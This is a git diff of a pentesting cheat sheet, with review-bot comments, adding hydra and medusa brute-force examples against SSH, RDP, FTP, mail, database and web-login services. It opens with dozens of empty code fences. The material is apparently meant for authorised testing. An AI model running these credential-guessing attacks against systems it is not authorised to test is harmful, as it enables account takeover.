+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
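Review bot: this new file is scaffolding rather than a walkthrough: after the ldapsearch commands it contains roughly fifty empty ``` fence pairs with nothing between them, the kerbrute/GetNPUsers/ldapsearch blocks have no explanation or results, there is only a `## user.txt` section and no root section, yet the front matter sets `draft: false`; either set `draft: true` or strip the empty fences before merging. Other points: `title: CAscade` has a capitalization typo; the two GetNPUsers invocations disagree on the flag spelling (`-dc-ip` vs `--dc-ip`; impacket's example scripts take the single-dash `-dc-ip`); the nmap line has a leading space inside the fence; `~/tools/kerbrute/dist/kerbrute_linux_amd64` and `~/borrar/users.txt` are machine-local paths that will not resolve for readers.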
diff --git a/docs/hydra.md b/docs/hydra.md
index 47962497b..decf67405 100644
--- a/docs/hydra.md
+++ b/docs/hydra.md
@@ -65,13 +65,34 @@ hydra -U http-post-form
hydra -l pentester -P /usr/share/wordlists/metasploit/password.lst zev0nlxhh78mfshrhzvq9h8vm.eu-central-4.attackdefensecloudlabs.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:S=Success"
+# Another example of a login form:
+hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 94.237.63.111 -s 47017 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
+# username=^USER^&password=^PASS^: The form parameters with placeholders for Hydra.
+# F=Invalid credentials: The failure condition – Hydra will consider a login attempt unsuccessful if it sees this string in the response.
+
+
+
# Example for ftp in a non default port
hydra -L users.txt -P pass.txt ftp://$ip:2121
+# Port: Specify a non-default port for the target service.
+hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp
+# Target the FTP service on ftp.example.com via port 2121.
+# Use the ftp module and provide verbose output (-V) for detailed monitoring.
+
+
# Attacking a pop3 service
hydra -L users.txt -p 'Company01!' -f $ip pop3
+# Tasks: Define the number of parallel tasks (threads) to run, potentially speeding up the attack.
+hydra -t 4 ...
+
+# Targeting Multiple SSH Servers
+hydra -l $username -p $password -M targets.txt ssh
+
+# Testing a RDP connection with a username Administrator and a password consisting of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers
+hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
```
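Review bot: the RDP example passes `-x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789`; hydra's `-x MIN:MAX:CHARSET` takes the shorthand `a` (lowercase), `A` (uppercase) and `1` (digits), with any other character added literally, so the intended character set is written `-x 6:8:aA1`. Also the new login-form example hard-codes a lab IP and port (94.237.63.111, 47017) in what is otherwise a generic cheat sheet; use `$ip` like the neighbouring examples. `Testing a RDP connection` should read `Testing an RDP connection`.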
@@ -86,3 +107,16 @@ hydra 192.168.1.45 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/P
hydra -l student -P /usr/share/wordlists/rockyou.txt ssh://192.153.213.3
```
+
+| Hydra Service | Service/Protocol | Description | Example Command |
+| ------------- | -------------------------------- | ------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- |
+| ftp | File Transfer Protocol (FTP) | Used to brute-force login credentials for FTP services, commonly used to transfer files over a network. | `hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100` |
+| ssh | Secure Shell (SSH) | Targets SSH services to brute-force credentials, commonly used for secure remote login to systems. | `hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100` |
+| http-get/post | HTTP Web Services | Used to brute-force login credentials for HTTP web login forms using either GET or POST requests. | `hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"` |
+| smtp | Simple Mail Transfer Protocol | Attacks email servers by brute-forcing login credentials for SMTP, commonly used to send emails. | `hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com` |
+| pop3 | Post Office Protocol (POP3) | Targets email retrieval services to brute-force credentials for POP3 login. | `hydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com` |
+| imap | Internet Message Access Protocol | Used to brute-force credentials for IMAP services, which allow users to access their email remotely. | `hydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com` |
+| mysql | MySQL Database | Attempts to brute-force login credentials for MySQL databases. | `hydra -l root -P /path/to/password_list.txt mysql://192.168.1.100` |
+| mssql | Microsoft SQL Server | Targets Microsoft SQL servers to brute-force database login credentials. | `hydra -l sa -P /path/to/password_list.txt mssql://192.168.1.100` |
+| vnc | Virtual Network Computing (VNC) | Brute-forces VNC services, used for remote desktop access. | `hydra -P /path/to/password_list.txt vnc://192.168.1.100` |
+| rdp | Remote Desktop Protocol (RDP) | Targets Microsoft RDP services for remote login brute-forcing. | `hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100` |
\ No newline at end of file
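Review bot: the `http-get/post` row's example command omits the target, so it is not runnable as written: hydra's `http-post-form` module still needs the host before the module name, in the `hydra 192.168.1.45 ssh ...` form shown in this hunk's header, e.g. `hydra -l admin -P /path/to/password_list.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"`. The service column also promises `http-get/post` while the example uses `http-post-form`, which is a different module; either name the form module in the first column or show the plain `http-post` example the column describes. Minor: the file still ends without a trailing newline (`\ No newline at end of file`), which this patch could fix.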
diff --git a/docs/medusa.md b/docs/medusa.md
index ed6a5cf0c..2defbd389 100644
--- a/docs/medusa.md
+++ b/docs/medusa.md
@@ -24,6 +24,15 @@ make
make install
```
+Alternative install:
+
+```bash
+sudo apt-get -y update
+sudo apt-get -y install medusa
+```
+
+
+
## Basic usage
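Review bot: the three blank lines added before `## Basic usage` should be collapsed to one, and a blank line is missing between the closing fence of the `make install` block and the new `Alternative install:` line, so the text sits directly against the fence. Since the commands use `apt-get`, label the heading as the Debian/Ubuntu package route (`Alternative install (apt):`) so readers on other distributions know it does not apply to them.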
@@ -37,5 +46,66 @@ medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121
# -h: host /IP
# -M: protocol to bruteforce
# -n: for a different non-default port. For instance, port 2121 for ftp
+
+
+# -m Module options: Provide additional parameters required by the chosen module, enclosed in quotes.
+medusa -M http -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^" ...
+
+# -t Tasks: Define the number of parallel login attempts to run, potentially speeding up the attack.
+medusa -t 4 ...
+
+# -f or -F: Fast mode: Stop the attack after the first successful login is found, either on the current host (-f) or any host (-F).
+medusa -f ... or medusa -F ...
+
+```
+
+
+## Medusa modules
+
+
+```bash
+# Testing for Empty or Default Passwords
+medusa -h 10.0.0.5 -U usernames.txt -e ns -M service_name
+# Perform additional checks for empty passwords (-e n) and passwords matching the username (-e s).
+# Use the appropriate service module (replace service_name with the correct module name).
+
+
+# FTP: File Transfer Protocol. Brute-forcing FTP login credentials, used for file transfers over a network.
+medusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt
+
+
+# HTTP: Hypertext Transfer Protocol. Brute-forcing login forms on web applications over HTTP (GET/POST).
+medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
+
+# IMAP: Internet Message Access Protocol. Brute-forcing IMAP logins, often used to access email servers.
+medusa -M imap -h mail.example.com -U users.txt -P passwords.txt
+
+# MySQL: MySQL Database. Brute-forcing MySQL database credentials, commonly used for web applications and databases.
+medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
+
+# POP3: Post Office Protocol 3. Brute-forcing POP3 logins, typically used to retrieve emails from a mail server.
+medusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt
+
+
+# RDP: Remote Desktop Protocol. Brute-forcing RDP logins, commonly used for remote desktop access to Windows systems.
+medusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt
+
+# SSHv2: Secure Shell (SSH). Brute-forcing SSH logins, commonly used for secure remote access.
+medusa -M ssh -h 192.168.1.100 -u root -P passwords.txt
+
+# Subversion (SVN): Version Control System. Brute-forcing Subversion (SVN) repositories for version control.
+medusa -M svn -h 192.168.1.100 -u admin -P passwords.txt
+
+# Telnet: Telnet Protocol. Brute-forcing Telnet services for remote command execution on older systems.
+medusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt
+
+# VNC: Virtual Network Computing. Brute-forcing VNC login credentials for remote desktop access.
+medusa -M vnc -h 192.168.1.100 -P passwords.txt
+
+# Web Form: Brute-forcing Web Login Forms. Brute-forcing login forms on websites using HTTP POST requests.
+medusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"
+
+# Targeting Multiple Web Servers with Basic HTTP Authentication
+medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET
```
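Review bot: the `-m` values in the HTTP examples do not match medusa's module options, so these commands document syntax medusa will reject rather than working usage. The line `medusa -M web-form ... -m FORM:"username=^USER^&password=^PASS^:F=Invalid"` borrows hydra's `:F=` failure-string suffix (it appears in the hydra table elsewhere in this patch); medusa's `web-form` module takes the form path in `FORM:`, the fields in a separate `FORM-DATA:` option and the failure string in `DENY-SIGNAL:`, each as its own `-m`. Likewise the `http` module has no `FORM:` option (`-m DIR:/login.php -m FORM:...`) and no `GET` option (`-M http -m GET`), and the raw `"POST /login.php HTTP/1.1\r\n..."` string passed to `-m` near the top of the hunk is not a module option either; rewrite these against the output of `medusa -M http -q` and `medusa -M web-form -q`. Also, `medusa -f ... or medusa -F ...` is prose inside a bash block and should be a comment, and the runs of blank lines inside both fences can be trimmed.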
diff --git a/docs/username-anarchy.md b/docs/username-anarchy.md
index 185d719ce..c3c29477f 100644
--- a/docs/username-anarchy.md
+++ b/docs/username-anarchy.md
@@ -28,4 +28,10 @@ git clone https://github.com/urbanadventurer/username-anarchy.git
```bash
cd username-anarchy
./username-anarchy -i /home/ltnbob/realneames.txt
-```
\ No newline at end of file
+```
+
+```bash
+# List modules
+./username-anarchy -l
+```
+
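Review bot: the comment `# List modules` mislabels the flag: in username-anarchy `-l` is `--list-formats`, which lists the username format plugins, so `# List username format plugins` is the accurate description. While touching this file, the context line above still reads `realneames.txt` (typo for `realnames.txt`) and hard-codes the user-specific path `/home/ltnbob/`; a generic placeholder path reads better in docs. The final `+` line adds a trailing empty line; drop it, since the patch already restores the missing newline at EOF.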